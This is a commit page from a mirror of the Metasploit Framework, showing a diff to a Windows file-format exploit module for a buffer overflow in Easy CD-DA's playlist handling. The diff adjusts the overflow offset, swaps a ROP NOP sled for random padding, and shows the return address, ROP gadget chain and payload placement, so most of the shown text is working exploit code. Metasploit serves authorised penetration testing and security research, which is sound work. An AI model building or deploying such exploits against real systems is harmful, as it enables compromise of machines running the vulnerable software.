infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Replace unnecessary NOP sled with random text

bug/bundler_fix
sgabe 2014-02-11 23:48:04 +01:00
parent 184ccb9e1e
commit 12471660e9
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/windows/fileformat/easycdda_pls_bof.rb
View File

@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1108,
'Offset' => 1112,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
]
@ -103,10 +103,10 @@ class Metasploit3 < Msf::Exploit::Remote
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack('V*')
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit = rand_text_alpha_upper(target['Offset'])
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rand_text_alpha_upper(56)
sploit << rop_nops(8)
sploit << rop_gadgets
sploit << make_nops(4)
sploit << payload.encoded